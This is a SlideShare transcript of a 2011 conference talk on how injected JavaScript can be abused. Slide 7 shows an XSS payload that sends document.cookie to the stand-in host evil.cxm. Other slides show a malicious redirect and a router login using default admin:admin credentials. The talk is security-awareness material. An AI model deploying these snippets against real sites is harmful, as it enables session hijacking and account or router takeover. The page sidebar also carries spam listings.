SlideShare una empresa de Scribd logo
1 de 16
JAVASCRIPT goneWILD AkashMahajan | jsFoo 2011
WARNING NSFW Don’t say I didn’t warn you. This presentation is Not Safe For Work.
Don’t worry I swear this presentation doesn’t have dirty pictures in it. No Dirty Pictures
DISCLAIMER Tech Lite This presentation is low on technical content.
Why bother? INCEPTION Planting the seed of an idea.
What is the idea? JavaScript code showing up in unexpected places can have unintended consequences. Can you have fun and profit from this somehow?
Wild Idea #1 Stealing a session cookie <script>  ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src","http://evil.cxm/cookiestealer?stolencookie" + document.cookie); document.body.appendChild(ifrm); </script> Firesheep also does session hijacking by stealing cookies in transit.
Wild Idea #1.5 One can steal username and password with JS in a login form.
Wilder Idea #2 Stealing the Google page rank  if(document.referrer == 'google')  { varlocationurl = 'http://evil.cxm/google1.php'; location.href = locationurl;     } Do you regularly check the link you get from google to your site?
Wilder Idea #2.5 What if the JavaScript redirects users to a malicious download page?
Wildest Idea #3 Login to an internal ADSL router website using a default username and password. varloginUrl = ‘http://admin:admin@192.168.1.1/’;  document.location = loginUrl; Obviously you all have changed the default password long back, right
Wildest Idea #3.5 Allowing untrusted code in the browser is not the smartest thing to do.
His WILDNESS!!! SamyKamkar wrote JS code to get more friends in MySpace.  At one point he had over a millionfriends in less than 24 hours
Jumping to conclusions JavaScript can be pretty wild if it shows up in unexpected places. The very idea that outside code is allowed execution in the browser is  radical and dangerous.
PIMPING MYSELF/ QnA AkashMahajan Web Security Consultant http://akashm.com | @makash akashmahajan@gmail.com | 9980527182
References, Attribution Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat 2006 conference.  http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf Image on slide 13 has been taken from http://www.flickr.com/photos/iscteiul/ . The image is available for reuse  under Creative Commons. Some Reference Links JavaScript History Stealing Attack http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html Samy is my Hero – MySpace XSS Worm http://namb.la/popular/tech.html JavaScript to steal session cookies http://jehiah.cz/a/xss-stealing-cookies-101 http://www.go4expert.com/forums/showthread.php?t=17066 http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ Trailer of the Movie ‘The Dirty Picture’ http://www.youtube.com/thedirtypicturefilm Ending of the movie inception explained. http://screenrant.com/inception-spoilers-discussion-kofi-68330/ 06-Grossman.pdf

Más contenido relacionado

Más de Akash Mahajan

Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Web application security
Web application securityWeb application security
Web application security
Akash Mahajan
 
Web application security
Web application securityWeb application security
Web application security
Akash Mahajan
 
Web application security
Web application securityWeb application security
Web application security
Akash Mahajan
 

Más de Akash Mahajan (13)

The real incident of stealing a droid app+data
The real incident of stealing a droid app+dataThe real incident of stealing a droid app+data
The real incident of stealing a droid app+data
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL Attacks
 
I haz your mouse clicks and key strokes
I haz your mouse clicks and key strokesI haz your mouse clicks and key strokes
I haz your mouse clicks and key strokes
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
 
Secure HTTP Headers c0c0n 2011 Akash Mahajan
Secure HTTP Headers c0c0n 2011 Akash MahajanSecure HTTP Headers c0c0n 2011 Akash Mahajan
Secure HTTP Headers c0c0n 2011 Akash Mahajan
 
Php security
Php securityPhp security
Php security
 
Secure passwords-theory-and-practice
Secure passwords-theory-and-practiceSecure passwords-theory-and-practice
Secure passwords-theory-and-practice
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks   akash mahajanTop 10 web application security risks   akash mahajan
Top 10 web application security risks akash mahajan
 
Web application security
Web application securityWeb application security
Web application security
 
Web application security
Web application securityWeb application security
Web application security
 
Web application security
Web application securityWeb application security
Web application security
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
Startups Security
Startups SecurityStartups Security
Startups Security
 

Último

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 

Último (20)

A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 

Javascript Gone Wild

  • 2. WARNING NSFW Don’t say I didn’t warn you. This presentation is Not Safe For Work.
  • 3. Don’t worry I swear this presentation doesn’t have dirty pictures in it. No Dirty Pictures
  • 4. DISCLAIMER Tech Lite This presentation is low on technical content.
  • 5. Why bother? INCEPTION Planting the seed of an idea.
  • 6. What is the idea? JavaScript code showing up in unexpected places can have unintended consequences. Can you have fun and profit from this somehow?
  • 7. Wild Idea #1 Stealing a session cookie <script> ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src","http://evil.cxm/cookiestealer?stolencookie" + document.cookie); document.body.appendChild(ifrm); </script> Firesheep also does session hijacking by stealing cookies in transit.
  • 8. Wild Idea #1.5 One can steal username and password with JS in a login form.
  • 9. Wilder Idea #2 Stealing the Google page rank if(document.referrer == 'google') { varlocationurl = 'http://evil.cxm/google1.php'; location.href = locationurl; } Do you regularly check the link you get from google to your site?
  • 10. Wilder Idea #2.5 What if the JavaScript redirects users to a malicious download page?
  • 11. Wildest Idea #3 Login to an internal ADSL router website using a default username and password. varloginUrl = ‘http://admin:admin@192.168.1.1/’; document.location = loginUrl; Obviously you all have changed the default password long back, right
  • 12. Wildest Idea #3.5 Allowing untrusted code in the browser is not the smartest thing to do.
  • 13. His WILDNESS!!! SamyKamkar wrote JS code to get more friends in MySpace. At one point he had over a millionfriends in less than 24 hours
  • 14. Jumping to conclusions JavaScript can be pretty wild if it shows up in unexpected places. The very idea that outside code is allowed execution in the browser is radical and dangerous.
  • 15. PIMPING MYSELF/ QnA AkashMahajan Web Security Consultant http://akashm.com | @makash akashmahajan@gmail.com | 9980527182
  • 16. References, Attribution Image on slide 12 has been taken from a presentation by Jeremiah Grossman at Black Hat 2006 conference. http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf Image on slide 13 has been taken from http://www.flickr.com/photos/iscteiul/ . The image is available for reuse under Creative Commons. Some Reference Links JavaScript History Stealing Attack http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html Samy is my Hero – MySpace XSS Worm http://namb.la/popular/tech.html JavaScript to steal session cookies http://jehiah.cz/a/xss-stealing-cookies-101 http://www.go4expert.com/forums/showthread.php?t=17066 http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ Trailer of the Movie ‘The Dirty Picture’ http://www.youtube.com/thedirtypicturefilm Ending of the movie inception explained. http://screenrant.com/inception-spoilers-discussion-kofi-68330/ 06-Grossman.pdf